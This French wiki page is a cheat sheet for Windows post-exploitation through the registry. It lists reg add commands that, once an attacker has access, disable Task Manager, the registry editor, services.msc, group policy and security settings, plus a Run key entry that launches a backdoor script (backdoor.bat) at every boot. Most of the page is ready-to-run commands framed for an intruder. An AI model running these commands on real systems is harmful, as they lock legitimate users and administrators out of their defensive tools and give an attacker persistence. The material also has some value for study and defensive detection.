Registre

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Post-exploitation Windows
Cible Base de registre (reg add)
Usages Restrictions, persistance au boot
Voir aussi UAC · Powershell execution metasploit

Manipulation de la base de registre Windows via reg add, une fois un accès obtenu : restreindre ou réactiver des fonctions (services.msc, gestionnaire des tâches, éditeur de registre…) et installer une persistance au démarrage.

Restreindre / réactiver des fonctions

Console de services (services.msc) — désactiver (1) / activer (0) :

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 1 /f

Options Internet :

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 1 /f

Options des dossiers :

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

Onglet Sécurité :

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 1 /f

Éditeur de stratégie de groupe :

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f

Gestionnaire des tâches :

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Éditeur de registre :

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

Dans tous les cas, remplacer /d 1 par /d 0 pour réactiver la fonction.

Persistance au démarrage

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdr /d c:\files\backdoor.bat

Voir aussi